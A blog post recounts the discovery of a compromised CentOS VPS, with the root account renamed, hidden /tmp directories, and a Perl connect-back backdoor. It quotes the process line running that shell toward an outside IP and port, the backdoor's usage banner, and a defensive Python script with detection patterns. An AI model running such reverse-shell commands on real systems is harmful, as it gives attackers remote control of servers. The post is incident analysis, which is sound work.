zuntan02's Hatena Blog

This is more or less a memo to myself. I sometimes repost things to the engineering blog at work, but this is the main place.

A long-neglected CentOS 5 environment on Sakura VPS had been taken over

【Background】

I logged in to tidy up a VPS environment I had been handing out for practice, ran su -, and got this:

su: user root does not exist

That was the reply.

Checking the processes, it looks as if root has been renamed to a user called firefart.

s aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
firefart     1  0.0  0.0  10372   688 ?        Ss    2015   0:12 init [3]
firefart     2  0.0  0.0      0     0 ?        S<    2015   0:29 [migration/0]
firefart     3  0.0  0.0      0     0 ?        SN    2015   0:00 [ksoftirqd/0]
firefart     4  0.0  0.0      0     0 ?        S<    2015   0:00 [watchdog/0]
firefart     5  0.0  0.0      0     0 ?        S<    2015   0:15 [migration/1]
firefart     6  0.0  0.0      0     0 ?        SN    2015   0:00 [ksoftirqd/1]
firefart     7  0.0  0.0      0     0 ?        S<    2015   0:01 [watchdog/1]
firefart     8  0.0  0.0      0     0 ?        S<    2015   3:48 [events/0]
firefart     9  0.0  0.0      0     0 ?        S<    2015   1:26 [events/1]
firefart    10  0.0  0.0      0     0 ?        S<    2015   0:08 [khelper]
firefart    19  0.0  0.0      0     0 ?        S<    2015   0:00 [kthread]
firefart    24  0.0  0.0      0     0 ?        S<    2015   0:01 [kblockd/0]
firefart    25  0.0  0.0      0     0 ?        S<    2015   0:00 [kblockd/1]
firefart    26  0.0  0.0      0     0 ?        S<    2015   0:00 [kacpid]
(omitted)
nobody    4826  0.0  0.1  10820  1072 ?        S    Feb16   0:00 sh -c perl kl.txt 96.125.170.94 21 2>&1 3>&1
nobody    4827  0.0  0.4  33312  4344 ?        S    Feb16   0:00 perl kl.txt 96.125.170.94 21

This kl.txt had been placed under /tmp, and it looked like this:

#!/usr/bin/perl
use IO::Socket;
#Cold-z3ro  Connect Back Shell
#code by:Cold-z3ro www.4azhar.com c.o.1.d.0@hotmail.com
#
#
#Cold-z3ro@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by Cold-z3ro ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#Cold-z3ro@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by Cold-z3ro  ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
(omitted)

Ugh. Sorry about that.

There was also a heap of other suspicious files under /tmp:

drwxrwxrwt 72 firefart root       4096 Mar 23 14:24 .
drwxr-xr-x  2 nobody   nobody     4096 Mar 11 09:50 .
drwxr-xr-x 23 firefart root       4096 Sep  1  2015 ..
drwxr-xr-x  3 nobody   nobody     4096 Feb 23 09:22 .aaapasiddwww
drwxr-xr-x  3 nobody   nobody     4096 Mar  3 04:40 .aepsouasxxxwer
drwxr-xr-x  3 nobody   nobody     4096 Feb 12 03:41 .apxcusug
drwxr-xr-x  2 nobody   nobody     4096 Dec 24  2010 bb
-rw-r--r--  1 nobody   nobody   176245 Mar  3 05:58 bb.zip
drwxr-xr-x  3 nobody   nobody     4096 Feb 19 14:29 .cpdiueixxxx
drwxr-xr-x  3 nobody   nobody     4096 Feb 14 01:52 .dposuxxxx
drwxr-xr-x  3 nobody   nobody     4096 Mar  1 07:10 .eodsdfolqrqre
drwxr-xr-x  3 nobody   nobody     4096 Mar  1 00:41 .eodsxxweuee
drwxr-xr-x  3 nobody   nobody     4096 Feb 27 23:51 .eodusudxxx
drwxr-xr-x  3 nobody   nobody     4096 Feb 27 07:59 .eouuidffwe
drwxr-xr-x  3 nobody   nobody     4096 Mar  3 09:22 .epdosudffs
drwxr-xr-x  3 nobody   nobody     4096 Mar  3 09:58 .epfsudfqeqew
drwxr-xr-x  3 nobody   nobody     4096 Feb 23 00:15 .epqwiuxxllsdifu
-rw-r--r--  1 nobody   nobody  3331445 Mar 11 09:45 e.tgz
drwxr-xr-x  2 nobody   nobody     4096 Mar  7 08:06 etn
drwxr-xr-x  3 nobody   nobody     4096 Mar  3 07:22 .fsodgfudfisd
drwxr-xr-x  2 nobody   nobody     4096 Mar  1 10:20 .hahayysdfds
drwxrwxrwt  2 firefart root       4096 Aug 26  2015 .ICE-unix
drwxr-xr-x  3 nobody   nobody     4096 Feb 20 08:14 .ipqqqqiiewer
drwxr-xr-x  3 nobody   nobody     4096 Mar 14 02:24 .iuewyreuwtr
drwxr-xr-x  3 nobody   nobody     4096 Mar 14 00:46 .kaisoxaisqqq
-rw-r--r--  1 nobody   nobody     1995 Jan 28 18:22 kl.txt
-rw-r--r--  1 nobody   nobody     1995 Jan 28 18:22 kl.txt.1
drwxr-xr-x  3 nobody   nobody     4096 Mar 12 16:36 .losdiuqweqw
drwxr-xr-x  2 nobody   nobody     4096 Jan  1 00:01 min
-rw-r--r--  1 nobody   nobody  1307222 Feb 21 08:03 min.tgz
drwxr-xr-x  3 nobody   nobody     4096 Mar  1 06:14 .odsfyiwekrwe
drwxr-xr-x  3 nobody   nobody     4096 Feb 11 02:05 .oiieworqqw
drwxr-xr-x  3 nobody   nobody     4096 Mar 11 10:00 .osdfdsfogf
drwxr-xr-x  2 nobody   nobody     4096 Feb 19 13:43 .osdixxxqwee
drwxr-xr-x  3 nobody   nobody     4096 Mar 11 08:55 .p
drwxr-xr-x  3 nobody   nobody     4096 Feb 16 03:59 .paidufyxxx
drwxr-xr-x  3 nobody   nobody     4096 Feb 25 07:56 .pdidysucsdfsd
drwxr-xr-x  3 nobody   nobody     4096 Mar  9 22:21 .pdsifxxqytqtrwe
drwxr-xr-x  3 nobody   nobody     4096 Mar 14 03:57 .pefiuwewerowe
drwxr-xr-x  3 nobody   nobody     4096 Mar 12 17:10 .pfsiduqeqw
-rw-r--r--  1 nobody   nobody    41917 Mar  3 06:02 pico
drwxr-xr-x  3 nobody   nobody     4096 Feb 28 10:13 .pidsufsdoqr
drwxr-xr-x  3 nobody   nobody     4096 Feb 12 03:30 .ppoiwqerower
drwxr-xr-x  3 nobody   nobody     4096 Feb 22 04:16 .psadfiuxiiqwqr
drwxr-xr-x  3 nobody   nobody     4096 Feb 12 09:07 .psdfyyqwq
drwxr-xr-x  3 nobody   nobody     4096 Feb 26 22:57 .psiduasidxxx
-rw-r--r--  1 nobody   nobody 11865549 Mar 11 08:56 p.tgz
drwxr-xr-x  3 nobody   nobody     4096 Feb 27 01:43 .pwidisdxxsdg
drwxr-xr-x  3 nobody   nobody     4096 Feb 23 11:38 .pwiuifksdsf
drwxr-xr-x  3 nobody   nobody     4096 Mar  2 05:02 .qoisofgodg
drwxr-xr-x  2 nobody   nobody     4096 Mar 12 15:36 .radiasiasa
drwxr-xr-x  3 nobody   nobody     4096 Mar 13 14:30 .radicalspiasdf
drwxr-xr-x  3 nobody   nobody     4096 Mar 13 16:32 .raldoasopww
drwxr-xr-x  2 nobody   nobody     4096 Feb 21 08:07 .sdfgigdfgdfgdfgdf
drwxr-xr-x  3 nobody   nobody     4096 Feb 16 06:33 .sdfguiowrfdfdg
drwxr-xr-x  3 nobody   nobody     4096 Mar  1 10:05 .sdgfduguiwerew
drwxr-xr-x  3 nobody   nobody     4096 Feb 17 13:29 .sdifdsfxx
drwxr-xr-x  3 nobody   nobody     4096 Mar  1 11:27 .sdifuixwerwq
drwxr-xr-x  3 nobody   nobody     4096 Feb 11 01:36 .sdjfusdiqeq
drwxr-xr-x  2 nobody   nobody     4096 Feb 27 11:28 .sdkifusdf
drwxr-xr-x  3 nobody   nobody     4096 Mar 11 11:09 .sdofdfgqweqw
drwxr-xr-x  3 nobody   nobody     4096 Feb 17 13:27 .sdofiosrwrwq
drwxr-xr-x  3 nobody   nobody     4096 Feb 11 01:01 .sdufuqrerewr
drwxr-xr-x  3 nobody   nobody     4096 Feb 14 02:41 .sdywyuqxxxx
-rw-------  1 nobody   nobody      112 Mar 19 16:49 sess_bcdc55fec762cd39f63c998a5b3b56f3
-rw-------  1 nobody   nobody      112 Mar 23 14:47 sess_fab50cb89f14720c8e4d42555c4ce69b
drwxr-xr-x  3 nobody   nobody     4096 Mar  1 10:43 .sidgfuiwrw
drwxr-xr-x  3 nobody   nobody     4096 Mar  1 15:21 .spdofdsujxxxx
drwxr-xr-x  3 nobody   nobody     4096 Feb 23 01:24 .spoiaudxxx
drwxr-xr-x  2 nobody   nobody     4096 Feb 27 11:49 st
-rw-r--r--  1 nobody   nobody     7638 Feb 27 12:05 st.tgz
drwxr-xr-x  3 nobody   nobody     4096 Mar 12 15:37 .woefifudfweqe
drwxr-xr-x  3 nobody   nobody     4096 Feb 27 01:28 .wpdisdifdssx
drwxr-xr-x  3 nobody   nobody     4096 Feb 25 21:52 .wpowuydasudi
drwxrwxrwt  2 firefart root       4096 Aug 26  2015 .X11-unix
drwxr-xr-x  2 nobody   nobody     4096 Feb 16 10:03 xp
drwxr-xr-x  3 nobody   nobody     4096 Feb 19 14:13 .xpuitgdfsddsg
drwxr-xr-x  3 nobody   nobody     4096 Feb 12 13:10 .xpxisuiqwer
drwxr-xr-x  3 nobody   nobody     4096 Feb 23 02:33 .xxuyyyhqwreqwr
drwxr-xr-x  3 nobody   nobody     4096 Feb 20 01:37 .zcjsfuwrwe
drwxr-xr-x  3 nobody   nobody     4096 Feb 28 01:07 .zlucudfidskgsf
drwxr-xr-x  3 nobody   nobody     4096 Feb  9 23:13 .zpoxaiuwewe
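A small triage script, added here as an example and not part of the original post, that flags the three things visible in the output above: a UID-0 entry in /etc/passwd that is not root, processes owned by a service account that run an interpreter with an "IP port" argument pair, and dotted directories in /tmp owned by the web-server account. The sample inputs are constructed from the listings in the post, and SERVICE_USERS is my assumption about which accounts a web server runs as.

```python
import re

# Constructed sample inputs modelled on the output shown in the post (not live reads).
SAMPLE_PASSWD = """firefart:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
"""
SAMPLE_PS = """USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
firefart     1  0.0  0.0  10372   688 ?        Ss    2015   0:12 init [3]
nobody    4826  0.0  0.1  10820  1072 ?        S    Feb16   0:00 sh -c perl kl.txt 96.125.170.94 21 2>&1 3>&1
nobody    4827  0.0  0.4  33312  4344 ?        S    Feb16   0:00 perl kl.txt 96.125.170.94 21
"""
SAMPLE_LS = """drwxrwxrwt 72 firefart root       4096 Mar 23 14:24 .
drwxr-xr-x  3 nobody   nobody     4096 Feb 23 09:22 .aaapasiddwww
drwxrwxrwt  2 firefart root       4096 Aug 26  2015 .ICE-unix
-rw-r--r--  1 nobody   nobody     1995 Jan 28 18:22 kl.txt
drwxr-xr-x  3 nobody   nobody     4096 Mar  3 04:40 .aepsouasxxxwer
"""
SERVICE_USERS = ("nobody", "apache", "www-data")   # assumption: web-server accounts
INTERPRETER = re.compile(r"\b(perl|python|php|sh|bash)\b")
IP_PORT = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\s+\d{1,5}\b")

def uid0_accounts(passwd_text):
    """Names of UID-0 accounts. Anything but ['root'] (e.g. 'firefart') needs explaining."""
    return [f[0] for f in (ln.split(":") for ln in passwd_text.splitlines())
            if len(f) >= 3 and f[2] == "0"]

def connect_back_candidates(ps_text):
    """ps aux lines where a service account runs an interpreter with an 'IP port'
    argument pair: the shape of the 'perl kl.txt' process in the post."""
    hits = []
    for line in ps_text.splitlines()[1:]:          # skip the header row
        parts = line.split(None, 10)                # COMMAND keeps its spaces
        if len(parts) == 11 and parts[0] in SERVICE_USERS:
            cmd = parts[10]
            if INTERPRETER.search(cmd) and IP_PORT.search(cmd):
                hits.append((int(parts[1]), parts[0], cmd))
    return hits

def hidden_service_dirs(ls_text):
    """Dotted directories in an 'ls -la /tmp' listing owned by a service account,
    ignoring the legitimate .ICE-unix/.X11-unix socket directories."""
    names = []
    for line in ls_text.splitlines():
        parts = line.split(None, 8)
        if len(parts) == 9 and parts[0].startswith("d") and parts[2] in SERVICE_USERS:
            name = parts[8]
            if name.startswith(".") and name not in (".", "..", ".ICE-unix", ".X11-unix"):
                names.append(name)
    return names
```

On a live host the same functions can be fed the contents of /etc/passwd, `ps aux` and `ls -la /tmp`; a non-empty result from any of them is a reason to treat the box as compromised rather than to clean it up in place.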

【Cause】

I had locked down ssh connections with hosts.allow, but a test PHP app (of now-unknown provenance) running on top of this had been receiving all sorts of POSTs, so my guess is that is how it was taken over.

I destroyed this environment.